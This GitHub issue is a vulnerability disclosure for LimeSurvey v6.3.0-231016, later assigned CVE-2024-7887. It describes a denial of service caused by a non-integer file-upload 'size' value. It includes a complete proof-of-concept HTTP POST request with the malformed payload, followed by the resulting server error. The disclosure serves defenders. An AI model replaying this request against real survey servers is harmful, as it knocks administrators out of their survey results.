Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

LimeSurvey v6.3.0-231016 Improper Input Validation #67

Open
Hebing123 opened this issue Aug 7, 2024 · 1 comment
Open

LimeSurvey v6.3.0-231016 Improper Input Validation #67

Hebing123 opened this issue Aug 7, 2024 · 1 comment

Comments

@Hebing123
Copy link
Owner

Hebing123 commented Aug 7, 2024

Summary

LimeSurvey is a widely used open-source online survey system. In version v6.3.0-231016, an input validation vulnerability has been identified, allowing attackers to exploit a vulnerability in surveys containing "file upload" options. This can lead to a denial of service by preventing administrators from accessing statistical results of affected surveys.

Details

The vulnerability is associated with surveys published by administrators that include the "file upload" option. During the survey submission process, users can upload files, and the system validates the size of uploaded files. However, in version v6.3.0-231016, proper input validation is not performed on the uploaded file size, enabling attackers to manipulate submitted data to bypass the expected handling of the system.

Specifically, attackers can manipulate the submitted data and set the "size" parameter to a non-integer value, such as a string. Due to the lack of appropriate input validation, the system fails to handle this non-integer value correctly, resulting in an error. This error renders administrators unable to access statistical results for the affected survey, as the system fails to correctly parse the input data.

Reproduction

  1. Log in to the administrator account.
  2. Create a survey containing the "file upload" option. For Examples: 949614.
  3. During the survey submission process, use manipulated data to set the "size" parameter to a non-integer value. [No permissions are required]

POC

POST /index.php/949614 HTTP/1.1 
Host: 192.168.160.130 
Content-Length: 1706 
Cache-Control: max-age=0 
Upgrade-Insecure-Requests: 1 
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoGwet3umTM5p8M8U 
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 
Accept-Encoding: gzip, deflate 
Accept-Language: zh-CN,zh;q=0.9 
Connection: close

------WebKitFormBoundaryoGwet3umTM5p8M8U Content-Disposition: form-data; name="YII_CSRF_TOKEN"

X3VhN0Y2cmIyNVhCMXdFV1BQN0pqVm5iWWw0Q1NpNWKEYOQK5nWbFzgIPM_Ra9R9HWiCLpQjslDBrDKki4XtyQ== 
------WebKitFormBoundaryoGwet3umTM5p8M8U Content-Disposition: form-data; name="fieldnames"

949614X1X1|949614X1X2|949614X1X2_filecount 
------WebKitFormBoundaryoGwet3umTM5p8M8U Content-Disposition: form-data; name="thisstep"

1 
------WebKitFormBoundaryoGwet3umTM5p8M8U Content-Disposition: form-data; name="sid"

949614 
------WebKitFormBoundaryoGwet3umTM5p8M8U Content-Disposition: form-data; name="start_time"

1692852765 
------WebKitFormBoundaryoGwet3umTM5p8M8U Content-Disposition: form-data; name="LEMpostKey"

1887323363 
------WebKitFormBoundaryoGwet3umTM5p8M8U Content-Disposition: form-data; name="relevance1"

1 
------WebKitFormBoundaryoGwet3umTM5p8M8U Content-Disposition: form-data; name="relevance2"

1 
------WebKitFormBoundaryoGwet3umTM5p8M8U Content-Disposition: form-data; name="relevanceG0"

1 
------WebKitFormBoundaryoGwet3umTM5p8M8U Content-Disposition: form-data; name="949614X1X1"

aeawe 
------WebKitFormBoundaryoGwet3umTM5p8M8U Content-Disposition: form-data; name="949614X1X2"

[{"title":"","comment":"","size":"5.201171875tesat","name":"GAIA-URL.txt","filename":"futmp_drezdtkw4u3rsf8_txt","ext":"txt"}] ------WebKitFormBoundaryoGwet3umTM5p8M8U Content-Disposition: form-data; name="949614X1X2_filecount"

1 
------WebKitFormBoundaryoGwet3umTM5p8M8U Content-Disposition: form-data; name="lastgroup"

949614X1 
------WebKitFormBoundaryoGwet3umTM5p8M8U Content-Disposition: form-data; name="move"

movesubmit 
------WebKitFormBoundaryoGwet3umTM5p8M8U--

Open http://192.168.160.130/index.php/responses/browse?surveyId=135964 The administrator is unable to open all statistical data for this questionnaire and prompts: Error code 500: Internal server error round(): Argument #1 ($num) must be of type int|float, string given.

Impact

Attackers can leverage this vulnerability to execute a denial-of-service attack, obstructing administrators from accessing statistical results of the affected survey. This disruption may lead to interrupted data analysis, impacting the effectiveness and availability of the survey.

Note

References from https://huntr.com/bounties/6636038f-5cc7-4f87-8a50-922d139d6485
Since the manufacturer did not apply for a CVE number for this vulnerability as required, I will apply for it myself.

@Hebing123
Copy link
Owner Author

Hebing123 commented Sep 5, 2024

CVE-2024-7887

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant